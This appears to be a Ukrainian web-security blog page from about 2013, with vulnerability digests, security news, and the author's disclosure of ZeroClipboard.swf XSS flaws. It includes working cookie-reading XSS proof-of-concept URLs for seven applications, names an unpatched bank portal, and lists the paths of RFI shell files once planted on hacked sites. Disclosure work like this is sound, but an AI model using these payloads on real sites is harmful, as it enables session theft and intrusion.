Websecurity - Веб безпека

Виявлені численні уразливості безпеки в Ruby.

Уразливі версії: Ruby 1.9.

Відмова в обслуговуванні, міжсайтовий скриптінг, обхід захисту.

• Ruby vulnerabilities (деталі)

В даній добірці експлоіти в веб додатках:

• FreeFloat FTP 1.0 Raw Commands Buffer Overflow (деталі)
• Microsoft Internet Explorer SLayoutRun Use-After-Free (MS13-009) (деталі)
• EChat Server 3.1 BoF-0day (деталі)
• Foxit Reader Plugin URL Processing Buffer Overflow (деталі)
• Joomla <=2.5.8,<=3.0.2 remote tcp connections opener (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах WordPressSearch, XML Sitemap Generator та NextGEN Gallery. Для котрих з’явилися експлоіти. WordPressSearch - це плагін для пошуку нерухомості, XML Sitemap Generator - це плагін для створення xml-файлів карти сайту, NextGEN Gallery - це плагін для створення галерей зображень.

• WordPressSearch plugin SQL Injection Vulnerability (деталі)
• XML Sitemap Generator 3.2.8 Code Injection (деталі)
• WordPress NextGEN Gallery 1.9.10 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

За повідомленням www.xakep.ru, оголошено конкурс нових алгоритмів хешування.

Ненадійність паролів і застосовуваних методів хешування останнім часом стала усім очевидна. Одержавши базу парольних хешів, зловмисники можуть у лічені дні розшифрувати більшу частину паролів. Що робити в такій ситуації - не зовсім зрозуміло. Деякі вважають, що виходом може бути застосування інших алгоритмів хешування. Для цього проводиться конкурс Password Hashing Competition.

Замість того, щоб піднімати безпеку сайтів і не допускати витоків паролів чи їхніх хешів, ці діячі пропонують боротися з наслідками. І організували такий конкурс. При тому, що алгоритмів хешування багато, в тому числі є нові алгоритми, які важче брутфорсяться. Але їм хочеться ще нових алгоритмів, аби тільки не проводити аудити безпеки власних сайтів .

За повідомленням ain.ua, українські інтернет-шахраї з початку року встигли збагатитися на 12,5 млн грн.

З початку року відділ МВС по боротьбі з кіберзлочинністю виявив 23 факти незаконного списання грошей з рахунків комерційних підприємств на суму близько 12,5 млн. грн. Удалося повернути майже 9,2 млн.

За словами представників відділу, розкривати подібні шахрайства вкрай складно, оскільки кіберзлочинці дуже легко знищують сліди шахрайства, і з’являється проблема з доказами. Приміром, при шахрайстві з крадіжкою грошей з рахунків хворих дітей кіберзлочинцям удалося вкрасти майже 100 тис. грн.

За повідомленням www.xakep.ru, Eurograbber пограбував європейців на 36 мільйонів євро.

Група шахраїв, що поширювала банківський троян Eurograbber, поставила новий рекорд по обсягу коштів, вилучених у жителів Західної Європи. За інформацією з нового звіту, опублікованого компаніями Versafe і Check Point Software Technologies, збиток від цієї шкідливої програми оцінюється в суму близько 36 мільйонів євро, а кількість потерпілих - приблизно в 30000 чоловік.

У січні, 17.01.2013, вийшли PHP 5.3.21 та PHP 5.4.11. В яких виправлено біля 10 багів. Дані релізи направлені на покращення стабільності гілок 5.3.x і 5.4.x.

У лютому, 21.02.2013, вийшли PHP 5.3.22 та PHP 5.4.12. В яких виправлено біля 10 багів. Дані релізи направлені на покращення стабільності гілок 5.3.x і 5.4.x.

Жодних уразливостей в цих версіях PHP виправлено не було.

По матеріалам http://www.php.net.

30.06.2012

У травні, 04.05.2012, я знайшов Brute Force, Cross-Site Scripting та Cross-Site Request Forgery уразливості на http://peb.com.ua - сайті банка “Промэкономбанк” (на одному піддомені). Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно уразливостей на сайтах банків останній раз я писав про energobank.com.ua.

Детальна інформація про уразливості з’явиться пізніше.

23.02.2013

BF + XSS + CSRF:

Всі зазначені уразливості знаходиться в клієнт-банкінгу банка Промекономбанк. Всього 109 уразливостей в системи IFOBS.

https://ibank.peb.com.ua:7002

Дані уразливості досі не виправлені.

У лютому, 17.02.2013, я знайшов Cross-Site Scripting уразливості в додатках, що містять ZeroClipboard.swf.

Раніше я писав про Cross-Site Scripting уразливості в ZeroClipboard. Як я зазначав, це дуже поширена флешка, що знаходиться на десятках тисяч, а потенційно і сотень тисяч веб сайтів. І вона використовується в сотнях веб додатків. Серед них YAML, Multiproject для Trac, UserCollections для Piwigo, TAO і TableTools для DataTables для jQuery. Та існує багато інших уразливих веб додатків з ZeroClipboard.

Cross-Site Scripting (WASC-08):

XSS через параметр id та XSS через копіювання атакуючого коду в буфер обміну (як я описав в попередньому записі).

YAML:

http://site/yaml/docs/assets/js/snippet/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Multiproject extension for Trac:

http://site/themes/default/htdocs/flash/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height 

UserCollections extension for Piwigo:

http://site/piwigo/extensions/UserCollections/template/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

TAO:

http://site/filemanager/views/js/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

TableTools plugin for DataTables plugin for jQuery:

http://site/path/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

InfoGlue:

http://site/script/jqueryplugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

OGDI Field for Drupal:

http://site/sites/all/modules/ogdi_field/plugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Вразливі наступні веб додатки з флешкою: YAML 4.0.2 та попередні версії, Multiproject 1.4.21 та попередні версії, UserCollections для Piwigo, TAO 2.3.1 та попередні версії, TableTools для DataTables для jQuery. Зокрема він постачається з InfoGlue 2.1 (та попередніми версіями) та OGDI Field 6.x-1.0 (та попередніми версіями) для Drupal.

Обидві XSS уразливості в ZeroClipboard вже виправлені в останній версії (від нових розробників) ZeroClipboard 1.1.7.

Після попереднього виявлення похаканих сайтів в моїх логах, приведу нову інформацію про взломані українських сайти. Що використовуються для атак (зокрема RFI атак) на інші сайти. Враховуючи, що після жовтня в моїх логах не було українських сайтів (тільки закордонні), що використовувалися для RFI атак, то я проаналізував більш старіші логи.

Похакані сайти в Уанеті:

• http://mpress.com.ua (невідомим хакером) - 04.2010
• http://pelet.at.ua (невідомим хакером) - 04.2010
• http://halupa.org.ua (невідомим хакером) - 05.2010
• http://tkj.at.ua (невідомим хакером) - 06.2010

Файли, що використовувалися для RFI атак (файли вже давно прибрані з сайтів):

http://mpress.com.ua/templates/zfxid1.txt
http://pelet.at.ua/bogel/id1.txt
http://halupa.org.ua/plugins/sh/id1.txt
http://halupa.org.ua/plugins/sh/idsuper.txt
http://tkj.at.ua/id1.txt

Продовжуючи розпочату традицію, після попереднього відео про викрадення рухів курсору в Internet Explorer, пропоную нове відео на веб секюріті тематику. Цього разу відео про RCE eксплоіт для Internet Explorer. Рекомендую подивитися всім хто цікавиться цією темою.

Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution Vulnerability

В даному відео ролику демонструється використання Metasploit Framework для проведення атаки на уразливість в Internet Explorer. В Metasploit створюється і запускається експлоіт для IE, який призводить до віддаленого виконання коду в Internet Explorer при відкритті сторінки з кодом експлоіту. Даний експлоіт відкриває шел на атакованому комп’ютері, що дозволяє нападнику отримати контроль над ним.

Атака відбувається при відвідуванні в IE спеціально створеного веб сайта, що містить код експлоіту. Рекомендую подивитися дане відео для розуміння векторів атак на браузери.

В даній добірці експлоіти в веб додатках:

• cURL Buffer Overflow Vulnerability (деталі)
• Mozilla Firefox 18.0.2/Opera 12.12/Internet Explorer 9 Memory Corruption (деталі)
• D-LINK DIR-300 / DIR-600 Remote Root Exploit (деталі)
• MS12-037 Internet Explorer 8 Same ID Property Deleted Object Handling Memory Corruption (деталі)
• Midori Browser 0.3.2 Denial Of Service Object++ Exploit (деталі)